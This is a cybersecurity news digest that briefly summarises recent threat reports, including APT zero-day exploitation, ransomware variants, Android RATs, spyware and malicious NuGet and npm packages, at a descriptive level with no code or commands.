Latest Cybersecurity News,Summarized

Amazon’s threat intelligence division uncovered a cyber-espionage campaign where an advanced persistent threat (APT) group exploited zero-day vulnerabilities in Cisco and Citrix systems. The attackers targeted critical identity and network access control infrastructure, using undisclosed flaws before vendors released patches. Amazon’s MadPot honeypot service detected the exploitation attempts, leading to the identification of CVE-2025-5777 and CVE-2025-20337. The threat actor deployed a custom web shell disguised as a legitimate component, operating in-memory and using advanced encryption techniques. Security teams are advised to implement defense-in-depth strategies and closely monitor for anomalous activity.

Hackers are exploiting Google’s Find Hub tool to track and remotely reset Android devices. The attacks start with spear-phishing messages on a popular messaging app, leading victims to execute malicious files. These files install remote access trojans, allowing attackers to harvest Google account credentials and use Find Hub to wipe devices. The attackers also use the GPS tracking feature to time their actions when victims are less likely to respond quickly. This campaign is linked to a known APT group, highlighting the evolving tactics of state-sponsored hackers.

Security researchers at ENKI have uncovered a sophisticated espionage campaign by the Lazarus Group targeting aerospace and defense organizations. The campaign, active since March 2025, uses phishing operations with malicious Word documents disguised as legitimate communications. The documents deploy a new variant of the Comebacker backdoor, which features advanced encryption and persistence mechanisms. The campaign's focus on specific organizations indicates a targeted espionage effort, with security teams advised to implement robust defenses against macro-based malware and spear phishing attempts.

The Acronis Threat Research Unit has identified a new DragonForce ransomware variant that uses Bring Your Own Vulnerable Driver (BYOVD) techniques to disable security software. The updated malware addresses previous encryption flaws and showcases a dramatic evolution in technical sophistication. Originally emerging in 2023, DragonForce rebranded itself as a cartel, attracting affiliates with customizable encryptors and infrastructure access. The group has become more aggressive, increasing global victim postings and expanding collaborations. Its most prominent campaign involved a joint attack on a major retailer alongside the Scattered Spider intrusion group. Acronis notes the inclusion of an encrypted configuration file and the use of vulnerable drivers to forcibly kill antivirus and EDR software.

Researchers at Mandiant Threat Defense, part of Google Cloud Security Operations, have revealed a critical unauthenticated access vulnerability in Gladinet’s Triofox file-sharing platform. The flaw, now patched as CVE-2025-12480, allowed attackers to bypass authentication and achieve SYSTEM-level code execution. The exploitation campaign was detected on August 24, 2025, with attackers targeting version 16.4.10317.56372. Mandiant confirmed that Gladinet has released a fix, and the vulnerability is resolved in new versions of Triofox. The attackers used the flaw to create an administrative account and execute malicious scripts, achieving code execution as SYSTEM. They also used PuTTY and Plink to create an SSH tunnel for covert persistence.

Cybersecurity researchers at Zensec uncovered a sophisticated supply-chain attack campaign in early 2025. Two prominent ransomware-as-a-service groups exploited critical vulnerabilities in SimpleHelp RMM software to breach downstream customers through managed service providers. The attacks leveraged three severe vulnerabilities, allowing attackers to bypass traditional security controls and move laterally with minimal friction. Despite available patches, numerous organisations fell victim to exploitation throughout Q1 and Q2 2025.

Microsoft researchers have identified a sophisticated side-channel attack called Whisper Leak that can infer conversation topics from encrypted AI chatbot traffic. Despite TLS encryption, the attack exploits patterns in packet sizes and timing to classify user prompts. Mitigations have been implemented by multiple vendors, but the attack poses significant risks, especially in regions with oppressive surveillance. The methodology and models are publicly available on GitHub for further research.

Researchers at zLabs have uncovered Fantasy Hub, a sophisticated Android Remote Access Trojan (RAT) sold as Malware-as-a-Service (MaaS) on cybercrime channels. The spyware enables full device control, data exfiltration, and banking credential theft. It features a phishing overlay system targeting major banks, allowing attackers to compromise financial accounts in real time. Fantasy Hub uses advanced evasion techniques and social engineering tactics to bypass detection and user scrutiny.

Researchers discovered nine malicious NuGet packages designed to sabotage database operations and Siemens S7 industrial control systems. These packages, published under the developer name shanhai666, contain legitimate functionality alongside harmful code scheduled to activate between 2027 and 2028. The most dangerous package, Sharp7Extend, targets Siemens PLCs with dual sabotage mechanisms, including immediate process termination and delayed write corruption. Organizations are advised to audit their systems for these packages and assume compromise if found.

A new ransomware strain, Midnight, has emerged, echoing the tactics of its predecessor, Babuk. First detected by Gen researchers, Midnight blends familiar ransomware mechanics with novel cryptographic modifications, some of which unintentionally open the door to file recovery. This represents a rare opportunity for victims to reclaim their data without paying a ransom. Midnight retains much of Babuk’s core structure while introducing several modifications, most notably in the cryptographic scheme used for file encryption. These changes, while likely intended to improve the ransomware’s effectiveness, inadvertently introduced weaknesses that make file decryption possible under certain conditions. Security vendors have released decryption tools specifically designed to address Midnight’s cryptographic flaws, guiding users through a wizard-based process to identify encrypted locations, verify file integrity, and restore data without requiring ransom payment.

Security researchers at Palo Alto Networks’ Unit 42 uncovered the Landfall spyware, which exploited a zero-day vulnerability in Samsung Galaxy phones. The spyware, first detected in July 2024, relied on a security flaw patched in April 2025. The attacks, likely driven by espionage, targeted individuals in a specific region. Landfall spyware shares overlapping digital infrastructure with a known surveillance vendor, Stealth Falcon. The spyware enables broad device surveillance, including accessing photos, messages, contacts, and location tracking. The campaign remained active and undetected for months, highlighting the sophistication of the attack.

Datadog Security Research discovered a sophisticated supply chain attack targeting the npm ecosystem. The campaign, attributed to threat actor cluster MUT-4831, involved 17 malicious packages designed to deliver the Vidar infostealer malware to Windows systems. These packages masqueraded as legitimate software development kits and libraries, executing destructive payloads through postinstall scripts. Despite being live for approximately two weeks, the packages were downloaded at least 2,240 times before removal. The Vidar malware, a Go-compiled variant, aggressively harvests sensitive data and uses hardcoded Telegram and Steam accounts for command-and-control infrastructure. The campaign highlights the persistent vulnerability of open-source package ecosystems to supply chain exploitation.